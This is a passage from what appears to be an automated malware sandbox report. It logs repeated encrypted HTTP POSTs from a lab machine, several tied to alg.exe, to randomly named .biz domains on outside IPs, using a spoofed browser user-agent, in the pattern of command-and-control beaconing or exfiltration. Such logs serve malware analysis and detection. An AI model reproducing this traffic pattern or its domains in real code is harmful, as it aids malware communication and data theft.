                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:40.655649900 CET834OUTData Raw: fa 8b ae 33 89 c3 95 11 36 03 00 00 3b 49 43 17 ee c0 4f 50 a6 b6 20 f5 ba e0 be 3b d3 c0 bf df a0 eb 2a 04 94 d5 fe 53 42 2e 10 92 39 ef d5 ab 33 de 0f 41 cb f7 ef 52 2b 4d e3 e6 0d 33 99 5e d2 fa b4 36 8d 28 fd 8f 51 55 60 a1 7d e9 ae e4 7a 5e
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 36;ICOP ;*SB.93AR+M3^6(QU`}z^:gyQV:,OW3%\7t9{VH:|,93_^W&7g$gz7e_]L.euf]8tJfD#s"'6h
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.624903917 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:41 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=70198797f976b84256cf63d09403d988|155.94.241.187|1731920381|1731920381|0|1|0; path=/; domain=.mgmsclkyu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        139192.168.2.105011872.52.178.23807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.147953987 CET349OUTPOST /qjhbu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: wxgzshna.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.147967100 CET778OUTData Raw: 24 f9 0f bd d4 58 e6 99 fe 02 00 00 28 5c 3a 4b 56 65 fb ba ff ab 86 2f 6e da 4b 5a 02 c3 d1 a5 5e 54 87 16 2e ba 3e d7 39 96 44 5c 20 61 73 6f 13 e0 9c 31 8e c1 12 18 36 93 9c 2f ed 45 b6 92 b0 3c 30 90 9c b2 cb 70 b6 54 29 e0 02 43 17 69 fb ed
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: $X(\:KVe/nKZ^T.>9D\ aso16/E<0pT)Ci?"M69.D:a:oENHxV/Fz g3\n)VMyXZxp9@FV-E)BEj|['7"%;'>hU)O


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        140192.168.2.105011918.141.10.10780
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.643486977 CET351OUTPOST /lxqioayc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: warkcdu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:41.643496990 CET834OUTData Raw: 87 bb 16 90 2e 21 11 5b 36 03 00 00 a8 1c 3c 10 c9 39 4d b2 2a 91 76 6d ac 2a 63 5c 41 9c 2d 3c 7d 1c de e1 ce 40 64 b8 41 13 33 e3 05 00 a4 c8 98 cc 21 a8 cd 0f ef 66 7b 77 c5 f3 88 88 75 27 4f 23 7a b4 40 12 50 5e 59 cc 4e 00 93 69 7e 18 73 ee
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: .![6<9M*vm*c\A-<}@dA3!f{wu'O#z@P^YNi~sm\|05V@GVd},|0|;_f8luK9fStSB2a)&c1XYHqa=zR&c0n>U6$]U4qtH70CM
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:43.106554031 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:42 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=fe6b6dbf45ce5009b53030923d48a235|155.94.241.187|1731920382|1731920382|0|1|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        141192.168.2.105012044.221.84.105807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:42.079713106 CET351OUTPOST /ryyevidfy HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: zrlssa.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:42.079735041 CET778OUTData Raw: 7a da ef 03 fe d4 b0 f9 fe 02 00 00 c1 38 9e e2 b4 8e 89 38 9e 9b 64 b7 17 e3 35 c5 d3 1f 09 18 b0 d1 be 71 56 52 eb d3 48 d0 5c 34 ae 5d 9d cd 27 50 98 af ab 64 b4 df 06 ec a2 2b 2c 87 73 35 61 df 2c 0e af fa 3b b1 b7 d7 bf d0 cf 25 bf 1b 69 22
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: z88d5qVRH\4]'Pd+,s5a,;%i"/"3wXgM<cAsj;a_m]O5$D *"0Vjk#*Fiyxd)!D6+)-vIiiD&h;">2i4-7iA.Z}W
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:42.751473904 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:42 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=5086fbab4b14f97125fc515dfda356c0|155.94.241.187|1731920382|1731920382|0|1|0; path=/; domain=.zrlssa.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        142192.168.2.105012113.251.16.15080
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:43.128339052 CET351OUTPOST /dgyuecpahg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: gcedd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:43.128350973 CET834OUTData Raw: 79 e2 3d 95 c5 3b b7 e0 36 03 00 00 9f 6b 42 9d 1a ea 0c 9d b8 94 a9 0e 82 95 7c d7 e2 b4 a9 ec 91 e0 45 66 99 00 07 e1 84 b0 6d e4 69 5d b6 d5 5f d4 90 06 1b 47 29 34 98 14 fc d5 03 30 56 eb 6b 1b e1 5a f5 33 ab 48 3e 3e 3c 11 20 4d ec 3b 40 13
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: y=;6kB|Efmi]_G)40VkZ3H>>< M;@GU-u\&1-lnG:K+1P7@E}1Y umj];Ijt>r^2f&_Bxk)THz]|eIo'j`kdrFN-+bn~
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:44.570369959 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=8135aa58e9d56fa4ec0ee44161e50f3b|155.94.241.187|1731920384|1731920384|0|1|0; path=/; domain=.gcedd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        143192.168.2.105012218.141.10.107807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:43.197602034 CET356OUTPOST /wpvwjnrkggb HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: jlqltsjvh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:43.197626114 CET778OUTData Raw: 1f 77 f5 de 27 b1 94 54 fe 02 00 00 03 bb a9 70 9e 32 04 41 87 c3 1a 8b a2 78 42 9d 8c 8e c1 00 e6 67 34 17 93 2f 60 ee e5 8e b7 b9 b1 b0 4d 36 18 85 c3 22 c0 77 7d 93 ab c8 44 0d 1b b6 0c f8 26 02 7f 90 d1 16 22 c3 a6 f0 64 7d d7 8a ce 06 6f 10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: w'Tp2AxBg4/`M6"w}D&"d}o:+!pwQ*&Q'Dr.I<J~3jY`Ym;MJldkaZ./SxD?rot2<={)D%H,2qxaCPb:[8Xa$| .L)
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:45.088054895 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:44 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=543e0d2e0c6e76ebd88d36e624201a4d|155.94.241.187|1731920384|1731920384|0|1|0; path=/; domain=.jlqltsjvh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        144192.168.2.105012318.208.156.24880
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:44.681026936 CET351OUTPOST /xgyfws HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: jwkoeoqns.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:44.681081057 CET834OUTData Raw: 65 f5 99 65 cb 6b 87 ec 36 03 00 00 8b 70 c4 d3 f8 17 fa 28 f7 b0 e7 ee 6a 86 be 0b 01 c1 6c 1d 6f fc 9b 82 c5 42 13 c3 a5 78 25 85 97 7d fc 76 4d c2 91 d3 4e b1 97 e3 9e 7a 4e 05 ba d8 8d 63 10 5e 05 d1 32 77 fd f5 7c 6d d1 a7 c2 73 d8 10 fe af
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: eek6p(jloBx%}vMNzNc^2w|ms8L|)-f0Uru/((?^,Kn@[W/t~00\#`9Zn$yIG$zUH{Vrz3l(_'64>OPf9
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:45.357831955 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:45 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=7dcda1f8c954fe9c322260fb2ade480c|155.94.241.187|1731920385|1731920385|0|1|0; path=/; domain=.jwkoeoqns.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        145192.168.2.105012418.246.231.12080
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:45.375941038 CET354OUTPOST /jgtblooqbwhrf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: xccjj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:45.375955105 CET834OUTData Raw: 2c 4d 8f 8d 36 81 3d df 36 03 00 00 e8 4d ae ab 84 5e 19 34 8a 44 7d a6 33 a4 b1 5d f0 14 54 0c bc e3 1e b1 fe 0c a7 65 62 86 17 94 df 15 60 6c 01 ba 17 4f 23 1e 79 69 60 b0 03 8c ea 88 af 9d 86 da 22 db 8e 9d 23 ab 7c 5a 22 93 95 d6 17 ce 7f b0
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ,M6=6M^4D}3]Teb`lO#yi`"#|Z"Qp*;{}|yj~f^L0\b]09CE::yN-MA)b~a4Oo]zRWE8Wj&Sa8|Xp+_+]QSiQwtYp7,e
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:46.215121984 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:46 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=56b5c9a597a31de6c06623e8d18cdb32|155.94.241.187|1731920386|1731920386|0|1|0; path=/; domain=.xccjj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        146192.168.2.105012518.208.156.248807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:45.543137074 CET356OUTPOST /gneaufgitjsgivk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: xyrgy.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:45.543159008 CET778OUTData Raw: 4e fa 5c 75 1e 34 ee 41 fe 02 00 00 25 b8 a5 50 4c 7c 5c 2d 07 38 c1 d6 9d ec f9 86 9c 26 29 b1 1a 91 36 4e cf 5b 36 59 06 9b 4e 41 9c dc 72 a1 7b 2a c2 56 f6 04 b9 dd 2f d0 f6 dc 20 02 c2 a1 13 67 47 c6 24 e2 57 74 84 c3 22 c4 3c db 2a 10 82 32
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: N\u4A%PL|\-8&)6N[6YNAr{*V/ gG$Wt"<*2%0g#lks2] EoyuK@\%{CWt~uvnyyRfOe54U2y13wJdK]ZgT)8f9|YFan
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:46.237864971 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:46 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=50adf83ebe8713b37f1f42a1994d4303|155.94.241.187|1731920386|1731920386|0|1|0; path=/; domain=.xyrgy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        147192.168.2.105012644.221.84.10580
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:46.236325979 CET346OUTPOST /of HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: hehckyov.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:46.236341000 CET834OUTData Raw: 21 3e 3a 3f 71 86 f9 7e 36 03 00 00 d0 b1 3a a3 13 1e 27 c7 f6 28 f1 cd 22 6b 72 92 84 99 1c 56 39 7d 6c 46 c0 5f 31 ca 5c 2c 90 52 b7 ba ae 97 40 7c 7e 62 cc 3e 86 27 ef 92 4d 3f 21 dd 0e 12 e1 93 17 a6 1d a3 88 19 36 5b 36 d4 22 95 96 fc 0b f8
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: !>:?q~6:'("krV9}lF_1\,R@|~b>'M?!6[6"M"$[HxsZ>%ciz7px}'oEtX;<&<Msn\${Hl[Vhi2<A={q%"TeZ 8i`goqF1\(PIX?
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:46.900810003 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:59:46 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=8374ce7067f6c900d42a4a37206140e7|155.94.241.187|1731920386|1731920386|0|1|0; path=/; domain=.hehckyov.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        148192.168.2.1050127172.234.222.143807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:46.352996111 CET361OUTPOST /qccuqoixlchlyacl HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: htwqzczce.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
